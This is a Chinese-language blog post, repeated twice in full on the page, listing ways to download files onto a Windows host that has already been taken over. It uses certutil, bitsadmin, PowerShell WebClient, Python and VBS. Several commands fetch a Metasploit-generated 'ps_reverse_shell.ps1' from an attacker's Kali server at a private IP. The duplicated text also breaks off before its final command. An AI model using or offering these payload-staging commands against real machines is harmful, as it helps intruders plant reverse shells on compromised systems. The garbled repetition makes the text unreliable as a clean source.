USB迷 | 专注于互联网分享

    最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。
    你的位置: 首页 > 业界 > Windows本地下载远程服务器文件方法总结

    Windows本地下载远程服务器文件方法总结

    业界 admin 10浏览 0评论

    文章目录

      • 一、目的
      • 二、环境
      • 三、使用命令
        • 3.1 certutil
        • 3.2 bitsadmin
        • 3.3 powershell
        • 3.4 Python
        • 3.5 VBS脚本

    一、目的

      拿到一台Windows主机,需要远程web站点上的文件到本地,可以参考以下方法!

    二、环境

    提供HTTP服务站点:

    • Kali:192.168.253.129 (kali搭建http服务,以msf生成的powershell payload为测试目标)

    下载文件的Windows Server服务器

    OS名称
    Windows Server 2008 R2 Datacenter
    Windows Server 2012 R2 Datacenter

    三、使用命令

    3.1 certutil

    命令限制:适用于Server 2003以上版本,以及Windows Server 2003 / 2003 R2,带有SP1/SP2的Windows Server 2003

    certutil -urlcache -split -f <站点文件路径>

    3.2 bitsadmin

    Tips:个别系统上拒绝访问添加文件,具体情况真实环境下自行测试

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.253.129/ps_reverse_shell.ps1" "c:\ps_reverse_shell.ps1"

    3.3 powershell

    # 进入powershell
powershell
# 执行
powershell (new-object Net.WebClient).DownloadFile('http://192.168.253.129/ps_reverse_shell.ps1','C:\ps_reverse_shell.ps1')

    3.4 Python

    (如果目标系统中有python,可以使用此方法,urlopen中是要下载的地址,open后是要保存的文件名称,不指定路径就是当前路径)

    #!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://10.32.22.238/index.html')
localFile = open('index.html', 'w')
localFile.write(u.read())
localFile.close()

    注意shell权限问题,否则open不到本地

    3.5 VBS脚本

    优点:兼容性强,windows都支持VBS脚本
    缺点: 字符太多,不方便准备vbs文件
    (下方URL地址需要更改,保存文件的地址需要更改,注意文件后缀需要和下载的一致)

    Set args = Wscript.Arguments
Url = "http://10.32.22.238/index.html"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile "C:\Users\KevinMahone\1.html", 2 '
end with

    Tips:如果在命令行下运行:(temp.vbs是上方的脚本文件)

    文章目录

      • 一、目的
      • 二、环境
      • 三、使用命令
        • 3.1 certutil
        • 3.2 bitsadmin
        • 3.3 powershell
        • 3.4 Python
        • 3.5 VBS脚本

    一、目的

      拿到一台Windows主机,需要远程web站点上的文件到本地,可以参考以下方法!

    二、环境

    提供HTTP服务站点:

    • Kali:192.168.253.129 (kali搭建http服务,以msf生成的powershell payload为测试目标)

    下载文件的Windows Server服务器

    OS名称
    Windows Server 2008 R2 Datacenter
    Windows Server 2012 R2 Datacenter

    三、使用命令

    3.1 certutil

    命令限制:适用于Server 2003以上版本,以及Windows Server 2003 / 2003 R2,带有SP1/SP2的Windows Server 2003

    certutil -urlcache -split -f <站点文件路径>

    3.2 bitsadmin

    Tips:个别系统上拒绝访问添加文件,具体情况真实环境下自行测试

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.253.129/ps_reverse_shell.ps1" "c:\ps_reverse_shell.ps1"

    3.3 powershell

    # 进入powershell
powershell
# 执行
powershell (new-object Net.WebClient).DownloadFile('http://192.168.253.129/ps_reverse_shell.ps1','C:\ps_reverse_shell.ps1')

    3.4 Python

    (如果目标系统中有python,可以使用此方法,urlopen中是要下载的地址,open后是要保存的文件名称,不指定路径就是当前路径)

    #!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://10.32.22.238/index.html')
localFile = open('index.html', 'w')
localFile.write(u.read())
localFile.close()

    注意shell权限问题,否则open不到本地

    3.5 VBS脚本

    优点:兼容性强,windows都支持VBS脚本
    缺点: 字符太多,不方便准备vbs文件
    (下方URL地址需要更改,保存文件的地址需要更改,注意文件后缀需要和下载的一致)

    Set args = Wscript.Arguments
Url = "http://10.32.22.238/index.html"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile "C:\Users\KevinMahone\1.html", 2 '
end with

    Tips:如果在命令行下运行:(temp.vbs是上方的脚本文件)

    与本文相关的文章

    发布评论

    评论列表 (0)

    1. 暂无评论